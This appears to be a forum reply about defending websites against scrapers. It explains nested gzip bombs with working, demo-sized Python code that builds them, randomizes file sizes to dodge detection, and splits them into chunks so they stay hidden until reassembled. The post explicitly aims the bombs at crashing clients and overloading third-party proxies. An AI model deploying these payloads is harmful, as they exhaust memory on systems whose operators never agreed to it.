
> Interesting. What does number 5 do?

LLM-based services that offer web scraping capabilities usually try to replace the scraper's interaction with the website in a programmatic manner. The exact prompt wording varies between services, of course, but the idea is that you, as a being-scraped-to-death server, learn which keywords people are scraping your website for. That way you at least learn something about why you are being scraped, and can adapt your website's structure and sitemap accordingly.

> how do gzip bombs works, does it automatically extract to the 20gb or the bot has to initiate the extraction?

The point behind it is that it's unlikely that script kiddies wrote their own HTTP parser that detects gzip bombs; they're reusing a tech stack or library made for the task at hand, e.g. python's libsoup to parse content, go's net/http, or php's curl bindings, etc.

A nested gzip bomb targets both the client and the proxy in between. The proxy (targeted via Transfer-Encoding) has to unpack ~2 GB into memory before it can process the response and pass the content on to its client. The client (targeted via Content-Encoding) has to unpack ~20 GB of gzip into memory before it can process the content, only to realize that it's basically all null bytes.
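A scaled-down sketch of what such a nested bomb looks like, assuming plain gzip for both layers (the sizes here are tiny stand-ins for the ~2 GB / ~20 GB figures above):

```python
import gzip

# Tiny stand-in for the ~20 GB null-byte payload described above.
INNER_SIZE = 10 * 1024 * 1024  # 10 MB of null bytes

# Layer 1: what the client unpacks when it strips Content-Encoding: gzip.
inner = gzip.compress(b"\x00" * INNER_SIZE)

# Layer 2: what the proxy unpacks when it strips Transfer-Encoding: gzip.
outer = gzip.compress(inner)

# Null bytes compress extremely well, so both layers stay small on disk
# while the decompressed payload is orders of magnitude larger.
print(len(inner), len(outer))
```

The asymmetry is the whole trick: the server ships a few kilobytes, and each hop that honors its encoding header pays the full decompressed size in memory.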

The idea is that a script kiddie's scraper script won't account for this, and in the process will DDoS the proxy, which in turn will block the client for violating the ToS of that web scraping / residential IP range provider.

The awesome part about gzip is that the size of the final container / gzip bomb can be varied: the null-byte payload length can simply be increased by, say, 10 GB + 1 byte, making the bomb undetectable again. In my case I keep 100 different ~100 kB files on the filesystem and serve them in a randomized manner, directly from the filesystem cache, so no CPU time is spent on generation.
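A minimal sketch of pre-generating such randomized files; the directory name, file count, and sizes below are made-up stand-ins for the ~100 kB files described above:

```python
import gzip
import os
import random

OUT_DIR = "bombs"          # hypothetical output directory
NUM_FILES = 5              # stand-in for the 100 files mentioned above
BASE_SIZE = 1024 * 1024    # 1 MB of null bytes as the base payload (demo-sized)

os.makedirs(OUT_DIR, exist_ok=True)
for i in range(NUM_FILES):
    # Vary the payload length by a random number of extra bytes so each
    # compressed file differs in size and is harder to fingerprint.
    padding = random.randrange(1, 4096)
    payload = b"\x00" * (BASE_SIZE + padding)
    with open(os.path.join(OUT_DIR, f"bomb_{i}.gz"), "wb") as f:
        f.write(gzip.compress(payload))
```

Pre-generating and serving from disk means the expensive compression happens once, offline, and the hot path is just a file read.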

You can actually go further and use Transfer-Encoding: chunked in languages that allow parallelization via processes, goroutines, or threads, and serve nested gzip bombs split into chunks of varying byte sizes, so they're undetectable until concatenated together on the other side :)
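The "concatenated together on the other side" part works because gzip members can be appended back to back and still form one valid stream. A sketch with tiny, made-up segment sizes:

```python
import gzip
import random

# Several independent gzip members with varied payload sizes -- each one
# could be emitted as its own Transfer-Encoding: chunked chunk, so no
# single chunk looks like a bomb on its own.
segments = []
total = 0
for _ in range(4):
    size = random.randrange(1_000, 10_000)
    total += size
    segments.append(gzip.compress(b"\x00" * size))

# A compliant client joins the chunks first and only then decompresses;
# Python's gzip module handles such concatenated members transparently.
wire = b"".join(segments)
assert len(gzip.decompress(wire)) == total
```

Since each segment is individually small and individually valid, a scanner inspecting chunks in isolation sees nothing unusual until the full stream is reassembled.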


